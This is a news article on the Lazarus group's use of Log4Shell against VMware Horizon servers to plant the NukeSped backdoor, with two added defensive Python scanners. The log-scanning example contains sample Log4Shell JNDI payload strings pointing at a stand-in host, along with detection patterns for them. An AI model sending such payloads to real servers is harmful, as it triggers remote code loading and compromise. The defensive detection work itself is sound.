Cyber Security News

Lazarus hackers Attack VMware Servers Using Log4Shell Exploits

Lazarus, one of the most prominent North Korean hacking groups, has exploited the Log4j RCE vulnerability (Log4Shell) to plant the NukeSped backdoor on VMware Horizon servers, which then retrieves information-stealing payloads.

The vulnerability is tracked as CVE-2021-44228 (Log4Shell) and affects a wide range of products, including VMware Horizon.

According to security analysts at AhnLab's ASEC, the threat actors behind the Lazarus group have been targeting vulnerable VMware products through Log4Shell since April 2022.

Vulnerable Horizon deployments were already being identified in January 2022, yet many administrators still have not applied the latest security updates.
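Because the article's point is that unpatched Log4j installations remain exposed, the following added example (not part of the article or of AhnLab's report) shows a defender-side check: it opens a log4j-core jar, reads the version from its Maven `pom.properties`, and reports whether the `JndiLookup` class that Log4Shell depends on is still present. The jar layout paths are the standard ones published by the Log4j project; the `build_sample_jar` helper and its contents are constructed test data, not real Log4j builds. The check covers CVE-2021-44228 only (fixed in 2.15.0, with a backport in 2.12.2); later Log4j CVEs required later releases.

```python
import io
import os
import zipfile
from typing import Dict, List, Optional, Tuple

# Standard paths inside a log4j-core jar (published Log4j project layout).
JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"


def parse_version(props: str) -> Optional[Tuple[int, ...]]:
    """Extract the 'version=' line of a Maven pom.properties as an int tuple."""
    for line in props.splitlines():
        if line.startswith("version="):
            parts = line.split("=", 1)[1].strip().split(".")
            try:
                return tuple(int(p) for p in parts)
            except ValueError:  # e.g. pre-release suffixes: treat as unknown
                return None
    return None


def inspect_log4j_jar(data: bytes) -> Dict[str, object]:
    """Inspect log4j-core jar bytes for CVE-2021-44228 exposure."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = set(zf.namelist())
        version = parse_version(zf.read(POM_PROPS).decode()) if POM_PROPS in names else None
    has_jndi = JNDI_LOOKUP in names
    # 2.15.0 was the first main-line release fixing CVE-2021-44228; the 2.12.x
    # branch received the same fix in 2.12.2. An unknown version is treated as
    # unfixed so the check stays conservative.
    fixed = version is not None and (
        version >= (2, 15, 0) or (2, 12, 2) <= version < (2, 13, 0)
    )
    return {
        "version": version,
        "jndi_lookup_present": has_jndi,
        # Removing JndiLookup.class was the vendor-recommended mitigation when
        # upgrading was not possible, so its absence clears the finding.
        "vulnerable_44228": has_jndi and not fixed,
    }


def scan_directory(root: str) -> List[Dict[str, object]]:
    """Walk a directory tree and inspect every jar that looks like log4j-core."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".jar"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                result = inspect_log4j_jar(fh.read())
            if result["version"] is None and not result["jndi_lookup_present"]:
                continue  # not a log4j-core jar at all
            result["path"] = path
            findings.append(result)
    return findings


def build_sample_jar(version: str, include_jndi: bool) -> bytes:
    """Constructed stand-in jar for demonstration; not a real Log4j build."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(
            POM_PROPS,
            f"groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion={version}\n",
        )
        zf.writestr("org/apache/logging/log4j/core/Logger.class", b"\xca\xfe\xba\xbe")
        if include_jndi:
            zf.writestr(JNDI_LOOKUP, b"\xca\xfe\xba\xbe")
    return buf.getvalue()


if __name__ == "__main__":
    for ver, jndi in [("2.14.1", True), ("2.14.1", False), ("2.17.1", True)]:
        print(ver, "JndiLookup" if jndi else "stripped", inspect_log4j_jar(build_sample_jar(ver, jndi)))
```

On a real host, point `scan_directory` at the application's install tree; a hit with `vulnerable_44228` set means the jar needs either an upgrade or the class removal mitigation before the server is considered safe from this particular bug.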

VMware Horizon Servers Were Targeted

The threat actors exploited the Log4j vulnerability in VMware Horizon's Apache Tomcat service in order to execute a PowerShell command.

Running this PowerShell command most likely installs the NukeSped backdoor on the server.
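The exploitation described above begins with a crafted request reaching the Horizon Tomcat service, which makes the web server's access log the first place a defender can spot it. The following added example (not part of the article or of AhnLab's analysis) scans constructed Tomcat access-log lines for the Log4j lookup syntax that Log4Shell abuses, rating a direct `${jndi:` lookup as high severity and any other `${name:` lookup in request data as medium. The log lines, IP addresses and severity labels are all constructed for the example.

```python
import re
from typing import Dict, List

# Constructed sample access-log lines (combined log format with User-Agent);
# not taken from the article or from any real incident.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Apr/2022:10:01:12 +0000] "GET /portal/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Apr/2022:10:01:15 +0000] "GET /portal/ HTTP/1.1" 200 5123 "-" "${jndi:ldap://203.0.113.7:1389/a}"
10.0.0.9 - - [12/Apr/2022:10:01:16 +0000] "GET /portal/ HTTP/1.1" 200 5123 "-" "${JNDI:RMI://203.0.113.7:1099/b}"
10.0.0.11 - - [12/Apr/2022:10:02:40 +0000] "GET /portal/?q=${env:HOME} HTTP/1.1" 200 5123 "-" "curl/7.79"
"""

# A JNDI lookup is the Log4Shell trigger; Log4j matches it case-insensitively,
# so the detector must too.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
# Any other Log4j lookup (${env:...}, ${sys:...}, ...) has no business in
# client-supplied request data and deserves a lower-severity alert.
LOOKUP_RE = re.compile(r"\$\{\s*[a-z]+\s*:", re.IGNORECASE)


def classify_line(line: str) -> str:
    """Return 'high', 'medium' or 'none' for a single access-log line."""
    if JNDI_RE.search(line):
        return "high"
    if LOOKUP_RE.search(line):
        return "medium"
    return "none"


def scan_log(text: str) -> List[Dict[str, object]]:
    """Return one finding per suspicious line: line number, severity, source IP."""
    findings: List[Dict[str, object]] = []
    for number, line in enumerate(text.splitlines(), start=1):
        severity = classify_line(line)
        if severity == "none":
            continue
        # First whitespace-separated field of the combined log format is the client IP.
        source_ip = line.split(" ", 1)[0]
        findings.append({"line": number, "severity": severity, "src": source_ip})
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

A high-severity hit from a source address should be correlated with process telemetry on the Horizon host for the minutes that follow, since the article's chain continues with a PowerShell command launched by the Tomcat process.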

Backdoor malware such as NukeSped can receive commands from the C&C server and execute them on the attacker's behalf. NukeSped was first associated with DPRK-affiliated hackers in the summer of 2018 and was later linked to a 2020 campaign staged by Lazarus.

The latest variant is written in C++ and uses RC4 encryption to secure communication with its C2 server, whereas the previous version used XOR encryption.

Once a system is compromised, NukeSped performs a variety of espionage activities, including:

  • Taking screenshots
  • Recording key presses
  • Accessing files
  • Support for command-line commands

The current NukeSped variant also includes two additional modules: one that dumps the contents of USB devices and another that accesses web cameras.

Data Targeted

The malware can steal several types of data, including:

  • Account credentials
  • Browsing history
  • Email account information
  • Names of recently used files from MS Office

In some attacks, Lazarus has been observed deploying Jin Miner rather than NukeSped via Log4Shell.

The recent Lazarus incident is the second known example of the group using LoLBins in a Windows-targeting campaign; the other was the use of crypto-mining malware on macOS and Windows computers.

The exploitation of Log4Shell adds to the already wide variety of tactics the hacking group uses in its attacks.



Gurubaran is a Security Consultant, Security Editor & Co-Founder of Cyber Security News & GBHackers On Security.
